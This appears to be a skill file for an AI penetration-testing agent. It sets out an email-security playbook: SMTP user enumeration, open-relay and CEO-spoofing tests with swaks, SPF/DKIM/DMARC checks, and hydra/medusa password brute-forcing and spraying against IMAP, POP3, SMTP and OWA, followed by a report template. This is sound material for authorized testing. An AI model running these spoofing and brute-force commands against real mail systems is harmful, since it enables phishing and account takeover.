| name | pentest-email |
| description | Email security testing — SMTP relay, open relay detection, user enumeration via VRFY/RCPT/EXPN, SPF/DKIM/DMARC auditing, email spoofing tests, IMAP/POP3 brute force, phishing simulation setup, and mail server misconfiguration for authorized engagements. |
| triggers | ["email","smtp","SMTP","mail server","phishing","email spoofing","email security","MX record","SPF","DKIM","DMARC","open relay","swaks","email enumeration","email brute","IMAP","POP3","email testing"] |
Email Penetration Testing Skill
Mail Service Ports Reference
| Port | Service | Common Vulnerabilities |
|---|
| 25 | SMTP | Open relay, VRFY/EXPN user enum |
| 465 | SMTPS | Deprecated SSL — cipher downgrade |
| 587 | Submission | Weak auth, credential brute force |
| 143 | IMAP | Credential brute, cleartext auth (no STARTTLS) |
| 993 | IMAPS | TLS cipher issues |
| 110 | POP3 | Credential brute, cleartext auth |
| 995 | POP3S | TLS cipher issues |
Phase 1 — Mail Server Discovery
apt-get install -y swaks smtp-user-enum
dig MX <target_domain> +short
dig MX <domain> | sort -n | awk '{print $2}'
nmap -sV -sC -T4 -p 25,465,587,143,993,110,995 <mail_server_ip> \
-oN /root/kali-workspace/nmap-mail.txt
nmap --script smtp-commands -p 25,587 <mail_server>
nmap --script smtp-open-relay,smtp-enum-users,smtp-ntlm-info -p 25,587 <mail_server>
nc -nv <mail_server> 25
Phase 2 — Email User Enumeration
smtp-user-enum -M VRFY \
-U /usr/share/seclists/Usernames/top-usernames-shortlist.txt \
-t <smtp_server> -p 25 \
-o /root/kali-workspace/smtp-enum-vrfy.txt
smtp-user-enum -M RCPT \
-U /root/kali-workspace/generated-emails.txt \
-D <target_domain> \
-t <smtp_server> -p 25 \
-o /root/kali-workspace/smtp-enum-rcpt.txt
smtp-user-enum -M EXPN \
-U /usr/share/seclists/Usernames/top-usernames-shortlist.txt \
-t <smtp_server> -p 25 \
-o /root/kali-workspace/smtp-enum-expn.txt
nc -nv <smtp_server> 25
EHLO attacker.com
VRFY root@<target_domain>
RCPT TO:<user@target_domain>
QUIT
python3 -c "
names = ['John Smith', 'Jane Doe']
domain = 'target.com'
for name in names:
f, l = name.lower().split()
print(f'{f}.{l}@{domain}')
print(f'{f[0]}{l}@{domain}')
print(f'{l}.{f}@{domain}')
" > /root/kali-workspace/email-perms.txt
smtp-user-enum -M RCPT -U /root/kali-workspace/email-perms.txt -t <smtp_server>
Phase 3 — SMTP Relay & Spoofing Tests
swaks --server <smtp_ip> \
--from attacker@evilsite.com \
--to victim@otherdomain.com \
--header "Subject: Open Relay Test" \
--body "Testing for open relay — authorized security test"
swaks --server <smtp_ip> \
--from ceo@<target_domain.com> \
--to <your_test_email> \
--header "Subject: Security Audit — Email Spoofing Test" \
--body "If received, email spoofing is possible on this domain."
swaks --server <smtp_ip> --port 587 --tls \
--auth LOGIN \
--auth-user <username> --auth-password <password> \
--to <recipient> \
--from <spoofed@domain.com> \
--header "Subject: Auth Relay Test"
swaks --server <smtp_ip> \
--from "CEO Real Name <ceo@lookalike-domain.com>" \
--to <target_recipient>
for domain in <target.com> example-partner.com example-bank.com; do
echo "Testing spoof from: $domain"
swaks --server <smtp_ip> --from forged@$domain --to test@your-domain.com \
--header "Subject: Spoof test from $domain" --quit-after DATA 2>&1 | tail -3
done
Phase 4 — SPF / DKIM / DMARC Audit
TARGET="target.com"
echo "=== SPF ===" && dig TXT $TARGET | grep "v=spf1"
echo "=== DMARC ===" && dig TXT _dmarc.$TARGET
echo "=== DKIM (common selectors) ==="
for sel in default google mail smtp selector1 selector2 k1 dkim; do
result=$(dig TXT ${sel}._domainkey.$TARGET +short)
[[ -n "$result" ]] && echo "Found: $sel → $result"
done
sslscan --no-colour <mail_server>:587
sslscan --no-colour <mail_server>:993
nmap --script ssl-enum-ciphers -p 465,587,993,995 <mail_server>
for record in "" "_dmarc" "default._domainkey" "mail._domainkey" "google._domainkey"; do
echo "--- ${record}.${TARGET} ---"
dig TXT "${record}.${TARGET}" +short
done
Phase 5 — Email Account Brute Force
hydra -f -L emails.txt -P /usr/share/wordlists/rockyou.txt \
imap://<mail_server> -t 4 -o /root/kali-workspace/hydra-imap.txt
hydra -f -L emails.txt -P /usr/share/wordlists/rockyou.txt \
pop3://<mail_server> -t 4
hydra -f -L emails.txt -P passwords.txt \
smtp://<mail_server>:587 -t 4
medusa -h <mail_server> -U emails.txt -P passwords.txt -M smtp -t 4 -f
hydra -f -L emails.txt -P passwords.txt \
https-post-form://<owa_url>/owa/auth/oauthtoken.aspx:username=^USER^&password=^PASS^:Authentication
netexec smtp <mail_server> -u users.txt -p passwords.txt --continue-on-success
hydra -f -L emails.txt -p "Autumn2024!" smtp://<mail_server>:587 -t 2
Phase 6 — Email Header Analysis
cat email.eml | grep -E "^Received:|^X-Originating-IP:|^From:|^Reply-To:|^Return-Path:"
cat email.eml | grep -E "DKIM-Signature|Received-SPF|Authentication-Results"
cat email.eml | grep "^Received:" | grep -oE '[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+'
cat email.eml | grep -A 1000 "Content-Transfer-Encoding: base64" | \
grep -v "Content-Transfer-Encoding" | base64 -d 2>/dev/null
Phase 7 — Reporting Template
# Email Security Assessment — <Domain>
## Mail Server Configuration
| Server | IP | Ports Open | TLS Version |
| --------------- | ------- | ------------ | ----------- |
| mail.target.com | x.x.x.x | 25, 587, 993 | TLS 1.2+ |
## SPF: ⚠ SOFTFAIL / ✓ PASS / ✗ MISSING
Record: v=spf1 include:\_spf.google.com ~all
Risk: Softfail (~all) — spoofed emails may still reach inbox
## DKIM: ✗ MISSING / ✓ CONFIGURED
Selector: default.\_domainkey — Not found
Risk: Emails can be forged without cryptographic signature
## DMARC: ✗ MISSING / ⚠ NONE / ✓ REJECT
Record: v=DMARC1; p=none; rua=mailto:dmarc@target.com
Risk: p=none = report only — spoofing not blocked/rejected
## Open Relay: ✗ VULNERABLE / ✓ CLOSED
Evidence: swaks sent attacker@example.com → victim@otherdomain.com — DELIVERED
Impact: CRITICAL — server can be used to send spam/phishing as ANY sender
## User Enumeration: ENABLED / DISABLED
Technique: RCPT TO accepted 47 valid, rejected 12 invalid
Evidence: smtp-user-enum output (Appendix A)
Found accounts: john@target.com, jane@target.com, admin@target.com
## TLS Audit
- Port 587: TLS 1.2 ✓ — TLS 1.0/1.1 supported ⚠ (should be disabled)
## Recommendations
1. Set DMARC p=reject (critical — currently p=none provides no protection)
2. Close open relay: restrict SMTP to authenticated users only
3. Disable VRFY and EXPN SMTP commands
4. Disable TLS 1.0 and 1.1 on all mail ports
5. Implement account lockout after 5 failed login attempts
ATT&CK Mapping
| Technique | ID | Method |
|---|
| Phishing | T1566 | swaks spoofing + open relay |
| Email Addresses | T1589.002 | smtp-user-enum VRFY/RCPT |
| Account Discovery | T1087.003 | EXPN enumeration |
| Brute Force | T1110.001 | hydra IMAP/SMTP |
| Valid Accounts | T1078 | Successful credential brute |
| Spearphishing | T1566.001 | Authenticated email spoofing |